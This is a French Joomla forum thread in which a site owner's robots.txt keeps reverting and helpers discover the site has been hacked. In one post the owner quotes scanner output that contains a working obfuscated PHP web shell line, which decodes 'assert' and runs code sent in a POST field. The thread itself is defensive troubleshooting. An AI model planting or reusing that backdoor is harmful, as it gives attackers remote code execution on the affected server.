Modification fichier robots.txt

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Modification fichier robots.txt

    Bonjour tout le monde,

    Voilà je reviens vers vous car je me retrouve une nouvelle fois devant un problème que je n'arrive pas à résoudre.
    Je souhaite effectuer une modification sur le fichier robots.txt de mon site : www.cryptoseries.fr

    Voici les les différentes options que j'ai tentées mais aucune ne fut fructueuse :

    1. Modification du fichier en local et envoi par FTP sur le serveur du site > le fichier reste tel qu'il était.
    2. J'ai modifié les droits d'accès de Filezilla pour éditer le fichier > le fichier revient tel qu'il était.
    3. Je suis passé par mon hébergeur (OVH) pour effectuer la modification directement depuis l'espace client > le fichier revient tel qu'il était.

    Je dois très certainement louper quelque chose, mais je ne vois pas comment modifier ce fichier qui semble figé sur le serveur.

    Pour info le fichier actuel contient les infos suivantes :
    User-agent: *
    Disallow:
    Sitemap:http://www.cryptoseries.fr/site_map.xml

    J'aimerais qu'il contienne ceci :
    User-agent: *
    Disallow: /administrator/
    Disallow: /cache/
    Disallow: /cli/
    Disallow: /components/
    # Disallow: /images/
    Disallow: /includes/
    Disallow: /installation/
    Disallow: /language/
    Disallow: /libraries/
    Disallow: /logs/
    # Disallow: /media/
    Disallow: /modules/
    Disallow: /plugins/
    # Disallow: /templates/
    Disallow: /tmp/
    Sitemap:http://www.cryptoseries.fr/site_map.xml

    Si vous avez des pistes, des éclaircissements, des solutions, je suis preneur.

    Merci beaucoup.
    Dernière édition par Chewy à 18/01/2018, 14h07

  • #2
    Bonjour.

    Si le fichier n'accepte pas les modifications, c'est qu'il est protégé en écriture. Je ne vois pas d'autre cas de figure.
    Tu dis avoir modifié les droits d'accès du fichier mais quel droits lui as-tu donnés ?
    As-tu éventuellement un plugin de protection ou pare-feu qui pourrait empêcher l'intervention ?
    Cordialement.
    __
    Eddy !!!
    Tutoriels BreezingForms en Français : https://www.breezingforms.eddy-vh.com/

    Commentaire


    • #3
      Bonjour,

      Le fichier a par défaut comme droit d'accès 604. J'ai tout passé en 777 pour avoir tous les droits, mais rien n'y fait. Il passe à nouveau en 604 une fois enregistré et ne conserve pas les modifications effectuées.
      Et je n'ai pas l'impression d'avoir un plugin de protection sur mon Joomla...

      Commentaire


      • #4
        Les modifications sont-elles bien faites sur le "bon" fichier ? Il n'y a pas de raison autre que celle de droits pour interdire la prise en compte des modifications.de ce fichier, ou d'une erreur de sélection du dossier du site.
        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
        MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

        Commentaire


        • #5
          Le fichier que je tente de modifier est celui nommé robots.txt à la racine du site.

          Commentaire


          • #6
            Peux-tu me communiquer par messagerie privée un accès ftp à la racine de ton serveur ?
            "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
            MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

            Commentaire


            • #7
              C'est fait

              Commentaire


              • #8
                Il y a des fichiers pirates à la racine du site. Mais une fois renommés pour éviter qu'ils soient utilisés, le problème du robots.txt reste entier.
                Et le fichier index.php lui-même est piraté, avec ajout de code à son début.

                Une fois ce code nettoyé dans index.php et les fichiers suspects renommés, les choses sont rentrées dans l'ordre.
                Première chose : change le mot de passe ftp, puis assure-toi que toutes tes extensions sont à jour.

                Il te restera à scanner le site avec le quickscan d'aeSecure, voire faire appel à Christophe pour un nettoyage, car je ne serais pas surpris qu'il y ait d’autres fichiers malicieux ailleurs.
                Dernière édition par RobertG à 16/01/2018, 10h45
                "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                Commentaire


                • #9
                  Confirmation du problème : après avoir renommé le fichier index, puis enregistré une copie sans le code pirate, l'accès au site est impossible, celui à l'administration fonctionne...

                  Après remplacement du code du fichier index.php par celui d'un fichier neuf de la 3.8.3, les choses sont rentrées dans l'ordre.

                  Neste donc à tester, nettoyer et sécuriser le site
                  Dernière édition par RobertG à 16/01/2018, 11h05
                  "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                  MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                  Commentaire


                  • #10
                    Ok super, un grand merci.
                    je vais donc tester le site avec quickscan et voir ce qu'il en ressort. Les extensions sont toutes à jour.
                    Du coup, mon site n'est pas assez sécurisé. Y a-t-il des manips à prévoir ou un plugin à installer ?
                    Dernière édition par Chewy à 16/01/2018, 12h00

                    Commentaire


                    • #11
                      Une fois le site redevenu propre (et le mot de passe ftp changé), installe et utilise aeSecure, au besoin en version Premium.
                      Mais la première chose est de faire un nettoyage complet.
                      "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                      MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                      Commentaire


                      • #12
                        Alors j'ai lancé l'analyse avec aesecure. Il a détecté 69 fichiers comme potentiellement dangereux. Le problème, c'est que je ne sais pas si c'est vraiment le cas. je suis un peu perdu face à tout ça. Là, ça dépasse mes connaissances et compétences... J'ai des résultats comme :

                        home/cryptosey/www/modules/mod_articles_categories/tmpl/system.php
                        <?php $x=base64_decode("YXNzZXJ0");$x($_POST['zzz']);?>
                        <?php
                        set_time_limit(0);
                        error_reporting(0);
                        if(get_magic_qu


                        /home/cryptosey/www/administrator/components/com_users/views/mail/view.html.php
                        *
                        * @return void
                        */
                        public function display($tpl = null)
                        {
                        // Redirect to admin index if mass mailer disabled in conf
                        if (JFactory::getApplication()->get('massmailoff', 0) == 1)
                        {
                        JFactory::get


                        /home/cryptosey/www/libraries/src/Environment/Browser.php
                        'geckobot',
                        'Gigabot',
                        'Girafabot',
                        'grub-client',
                        'Gulliver',
                        'HTTrack',
                        'ia_archiver',
                        'InfoSeek',
                        'kinjabot',
                        'KIT-Fireball',
                        'larbin',
                        'LEIA',
                        'lmspider',


                        /home/cryptosey/www/libraries/fof/database/driver/postgresql.php
                        lic function getTableKeys($table)
                        {
                        $this->connect();
                        // To check if table exists and prevent SQL injection
                        $tableList = $this->getTableList();
                        if (in_array($table, $tableList))
                        { // Get the detail

                        Commentaire


                        • #13
                          Alors finalement, j'ai comparé les fichiers détectés avec les fichiers neufs d'un joomla 3.8.3 et rien n'est ressorti comme étant vraiment suspect. J'ai seulement supprimé un fichier dans un plugin qui me semblait louche et supprimé ce fichier "/www/components/RxR_1514575323.php" qui n'avait pas à être là. Le reste a l'air ok. J'espère que la façon dont j'ai procédée est correcte...

                          Commentaire


                          • #14
                            C'est à espérer que ces saletés n'ont pas été écrire dans les fichiers originaux de ton Joomla ou de ton template… Voir dans la base de données si c'est toutefois possible ?
                            Cordialement.
                            __
                            Eddy !!!
                            Tutoriels BreezingForms en Français : https://www.breezingforms.eddy-vh.com/

                            Commentaire


                            • #15
                              Bonsoir,
                              @Chewy
                              Quickscan est un outils qui va te donner des pistes ... si tu ne sais pas les exploiter, ça va devenir très compliqué ... car si tu laisses , ne serait ce qu'une infime porte entrouverte ... c'est mort !

                              Pour moi, tu n'as que 2 solutions :
                              - Faire remonter une sauvegarde PROPRE
                              - Faire appel a un "pro" pour le nettoyage
                              Dernière édition par manu93fr à 17/01/2018, 02h31
                              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X